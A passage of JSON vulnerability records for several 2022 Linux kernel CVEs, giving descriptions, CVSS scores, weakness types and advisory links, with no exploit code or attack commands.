"https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=7e6bc1f6cabcd30aba0b11219d8e01b952eacbb6", "refsource": "MISC", "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=7e6bc1f6cabcd30aba0b11219d8e01b952eacbb6" }, { "name": "https://lore.kernel.org/netfilter-devel/cd9428b6-7ffb-dd22-d949-d86f4869f452@randorisec.fr/T/#u", "refsource": "MISC", "url": "https://lore.kernel.org/netfilter-devel/cd9428b6-7ffb-dd22-d949-d86f4869f452@randorisec.fr/T/#u" }, { "name": "https://www.openwall.com/lists/oss-security/2022/07/02/3", "refsource": "MISC", "url": "https://www.openwall.com/lists/oss-security/2022/07/02/3" }, { "name": "[oss-security] 20220705 Re: Linux kernel: Netfilter heap buffer overflow in nft_set_elem_init", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2022/07/05/1" }, { "name": "https://www.randorisec.fr/crack-linux-firewall/", "refsource": "MISC", "url": "https://www.randorisec.fr/crack-linux-firewall/" }, { "name": "DSA-5191", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5191" }, { "name": "[oss-security] 20220806 Re: Linux kernel: Netfilter heap buffer overflow in nft_set_elem_init", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2022/08/06/5" }, { "name": "https://security.netapp.com/advisory/ntap-20220826-0004/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20220826-0004/" }, { "name": "http://packetstormsecurity.com/files/168191/Kernel-Live-Patch-Security-Notice-LSN-0089-1.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/168191/Kernel-Live-Patch-Security-Notice-LSN-0089-1.html" }, { "name": "http://packetstormsecurity.com/files/168543/Netfilter-nft_set_elem_init-Heap-Overflow-Privilege-Escalation.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/168543/Netfilter-nft_set_elem_init-Heap-Overflow-Privilege-Escalation.html" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-34918", "datePublished": "2022-07-04T20:07:32", "dateReserved": "2022-07-04T00:00:00", "dateUpdated": "2024-08-03T09:22:10.749Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3545
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A vulnerability has been found in Linux Kernel and classified as critical. Affected by this vulnerability is the function area_cache_get of the file drivers/net/ethernet/netronome/nfp/nfpcore/nfp_cppcore.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211045 was assigned to this vulnerability.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:01.597Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=02e1a114fdb71e59ee6770294166c30d437bf86a" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211045" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20221223-0003/" }, { "name": "DSA-5324", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability has been found in Linux Kernel and classified as critical. Affected by this vulnerability is the function area_cache_get of the file drivers/net/ethernet/netronome/nfp/nfpcore/nfp_cppcore.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211045 was assigned to this vulnerability." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-03T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=02e1a114fdb71e59ee6770294166c30d437bf86a" }, { "url": "https://vuldb.com/?id.211045" }, { "url": "https://security.netapp.com/advisory/ntap-20221223-0003/" }, { "name": "DSA-5324", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "Linux Kernel IPsec nfp_cppcore.c area_cache_get use after free", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3545", "datePublished": "2022-10-17T00:00:00", "dateReserved": "2022-10-17T00:00:00", "dateUpdated": "2024-08-03T01:14:01.597Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3564
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A vulnerability classified as critical was found in Linux Kernel. Affected by this vulnerability is the function l2cap_reassemble_sdu of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211087.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:01.563Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=89f9f3cb86b1c63badaf392a83dd661d56cc50b1" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211087" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20221223-0001/" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability classified as critical was found in Linux Kernel. Affected by this vulnerability is the function l2cap_reassemble_sdu of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211087." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-24T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=89f9f3cb86b1c63badaf392a83dd661d56cc50b1" }, { "url": "https://vuldb.com/?id.211087" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "url": "https://security.netapp.com/advisory/ntap-20221223-0001/" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "Linux Kernel Bluetooth l2cap_core.c l2cap_reassemble_sdu use after free", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3564", "datePublished": "2022-10-17T00:00:00", "dateReserved": "2022-10-17T00:00:00", "dateUpdated": "2024-08-03T01:14:01.563Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3435
Vulnerability from cvelistv5
Published
2022-10-08 00:00
Modified
2024-08-03 01:07
Severity ?
EPSS score ?
Summary
A vulnerability classified as problematic has been found in Linux Kernel. This affects the function fib_nh_match of the file net/ipv4/fib_semantics.c of the component IPv4 Handler. The manipulation leads to out-of-bounds read. It is possible to initiate the attack remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-210357 was assigned to this vulnerability.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:07:06.583Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/netdev/20221005181257.8897-1-dsahern%40kernel.org/T/#u" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.210357" }, { "name": "FEDORA-2022-2cfbe17910", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/" }, { "name": "FEDORA-2022-b948fc3cfb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/" }, { "name": "FEDORA-2022-1a5b125ac6", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability classified as problematic has been found in Linux Kernel. This affects the function fib_nh_match of the file net/ipv4/fib_semantics.c of the component IPv4 Handler. The manipulation leads to out-of-bounds read. It is possible to initiate the attack remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-210357 was assigned to this vulnerability." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119 Memory Corruption -\u003e CWE-125 Out-of-Bounds Read", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-22T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://lore.kernel.org/netdev/20221005181257.8897-1-dsahern%40kernel.org/T/#u" }, { "url": "https://vuldb.com/?id.210357" }, { "name": "FEDORA-2022-2cfbe17910", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/" }, { "name": "FEDORA-2022-b948fc3cfb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/" }, { "name": "FEDORA-2022-1a5b125ac6", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" } ], "title": "Linux Kernel IPv4 fib_semantics.c fib_nh_match out-of-bounds", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3435", "datePublished": "2022-10-08T00:00:00", "dateReserved": "2022-10-08T00:00:00", "dateUpdated": "2024-08-03T01:07:06.583Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2586
Vulnerability from cvelistv5
Published
2024-01-08 17:46
Modified
2024-08-19 07:48
Severity ?
EPSS score ?
Summary
It was discovered that a nft object or expression could reference a nft set on a different nft table, leading to a use-after-free once that table was deleted.
References
▼ | URL | Tags |
---|---|---|
https://ubuntu.com/security/notices/USN-5564-1 | third-party-advisory | |
https://ubuntu.com/security/notices/USN-5560-2 | third-party-advisory | |
https://ubuntu.com/security/notices/USN-5582-1 | third-party-advisory | |
https://ubuntu.com/security/notices/USN-5567-1 | third-party-advisory | |
https://ubuntu.com/security/notices/USN-5560-1 | third-party-advisory | |
https://ubuntu.com/security/notices/USN-5566-1 | third-party-advisory | |
https://www.openwall.com/lists/oss-security/2022/08/09/5 | issue-tracking | |
https://ubuntu.com/security/notices/USN-5565-1 | third-party-advisory | |
https://www.zerodayinitiative.com/advisories/ZDI-22-1118/ | issue-tracking | |
https://lore.kernel.org/netfilter-devel/20220809170148.164591-1-cascardo@canonical.com/T/#t | issue-tracking | |
https://ubuntu.com/security/notices/USN-5562-1 | third-party-advisory | |
https://ubuntu.com/security/notices/USN-5557-1 | third-party-advisory | |
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2586 | issue-tracking |
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | The Linux Kernel Organization | linux |
Version: 0 ≤ |
|
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "linux_kernel", "vendor": "linux", "versions": [ { "lessThan": "6.0-rc1", "status": "affected", "version": "0", "versionType": "custom" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2022-2586", "options": [ { "Exploitation": "active" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-06-26T15:34:35.432398Z", "version": "2.0.3" }, "type": "ssvc" } }, { "other": { "content": { "dateAdded": "2024-06-26", "reference": "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json" }, "type": "kev" } } ], "providerMetadata": { "dateUpdated": "2024-06-26T16:20:22.577Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "timeline": [ { "lang": "en", "time": "2024-06-26T00:00:00+00:00", "value": "CVE-2022-2586 added to CISA KEV" } ], "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-19T07:48:13.351Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5564-1" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5560-2" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5582-1" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5567-1" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5560-1" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5566-1" }, { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2022/08/09/5" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5565-1" }, { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-22-1118/" }, { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://lore.kernel.org/netfilter-devel/20220809170148.164591-1-cascardo@canonical.com/T/#t" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5562-1" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://ubuntu.com/security/notices/USN-5557-1" }, { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2586" }, { "url": "https://www.vicarius.io/vsociety/posts/use-after-free-vulnerability-linked-chain-between-nft-tables-cve-2022-2586" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "packageName": "linux", "platforms": [ "Linux" ], "product": "linux", "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git", "vendor": "The Linux Kernel Organization", "versions": [ { "lessThan": "6.0~rc1", "status": "affected", "version": "0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "type": "finder", "value": "Team Orca of Sea Security (@seasecresponse) working with Trend Micro\u0027s Zero Day Initiative" } ], "descriptions": [ { "lang": "en", "value": "It was discovered that a nft object or expression could reference a nft set on a different nft table, leading to a use-after-free once that table was deleted." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-08T17:46:06.110Z", "orgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc", "shortName": "canonical" }, "references": [ { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5564-1" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5560-2" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5582-1" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5567-1" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5560-1" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5566-1" }, { "tags": [ "issue-tracking" ], "url": "https://www.openwall.com/lists/oss-security/2022/08/09/5" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5565-1" }, { "tags": [ "issue-tracking" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-22-1118/" }, { "tags": [ "issue-tracking" ], "url": "https://lore.kernel.org/netfilter-devel/20220809170148.164591-1-cascardo@canonical.com/T/#t" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5562-1" }, { "tags": [ "third-party-advisory" ], "url": "https://ubuntu.com/security/notices/USN-5557-1" }, { "tags": [ "issue-tracking" ], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2586" } ] } }, "cveMetadata": { "assignerOrgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc", "assignerShortName": "canonical", "cveId": "CVE-2022-2586", "datePublished": "2024-01-08T17:46:06.110Z", "dateReserved": "2022-07-29T22:01:19.576Z", "dateUpdated": "2024-08-19T07:48:13.351Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-42703
Vulnerability from cvelistv5
Published
2022-10-09 00:00
Modified
2024-08-03 13:10
Severity ?
EPSS score ?
Summary
mm/rmap.c in the Linux kernel before 5.19.7 has a use-after-free related to leaf anon_vma double reuse.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:10:41.240Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2351" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.19.7" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/2555283eb40df89945557273121e9393ef9b542b" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=2555283eb40df89945557273121e9393ef9b542b" }, { "tags": [ "x_transferred" ], "url": "https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "mm/rmap.c in the Linux kernel before 5.19.7 has a use-after-free related to leaf anon_vma double reuse." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-08T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2351" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.19.7" }, { "url": "https://github.com/torvalds/linux/commit/2555283eb40df89945557273121e9393ef9b542b" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=2555283eb40df89945557273121e9393ef9b542b" }, { "url": "https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-42703", "datePublished": "2022-10-09T00:00:00", "dateReserved": "2022-10-09T00:00:00", "dateUpdated": "2024-08-03T13:10:41.240Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3646
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function nilfs_attach_log_writer of the file fs/nilfs2/segment.c of the component BPF. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211961 was assigned to this vulnerability.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:03.291Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=d0d51a97063db4704a5ef6bc978dddab1636a306" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211961" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function nilfs_attach_log_writer of the file fs/nilfs2/segment.c of the component BPF. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211961 was assigned to this vulnerability." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-404", "description": "CWE-404 Denial of Service -\u003e CWE-401 Memory Leak", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-24T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=d0d51a97063db4704a5ef6bc978dddab1636a306" }, { "url": "https://vuldb.com/?id.211961" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "Linux Kernel BPF segment.c nilfs_attach_log_writer memory leak", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3646", "datePublished": "2022-10-21T00:00:00", "dateReserved": "2022-10-21T00:00:00", "dateUpdated": "2024-08-03T01:14:03.291Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-4378
Vulnerability from cvelistv5
Published
2023-01-05 00:00
Modified
2024-08-03 01:41
Severity ?
EPSS score ?
Summary
A stack overflow flaw was found in the Linux kernel's SYSCTL subsystem in how a user changes certain kernel parameters and variables. This flaw allows a local user to crash or potentially escalate their privileges on the system.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:41:44.182Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2152548" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/stable-queue.git/tree/queue-6.0/proc-avoid-integer-type-confusion-in-get_proc_long.patch" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/stable-queue.git/tree/queue-6.0/proc-proc_skip_spaces-shouldn-t-think-it-is-working-on-c-strings.patch" }, { "tags": [ "x_transferred" ], "url": "https://seclists.org/oss-sec/2022/q4/178" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/171289/Kernel-Live-Patch-Security-Notice-LNS-0092-1.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "kernel 6.0.12" } ] } ], "descriptions": [ { "lang": "en", "value": "A stack overflow flaw was found in the Linux kernel\u0027s SYSCTL subsystem in how a user changes certain kernel parameters and variables. This flaw allows a local user to crash or potentially escalate their privileges on the system." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-131", "description": "CWE-131-\u003eCWE-120", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-03-08T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": 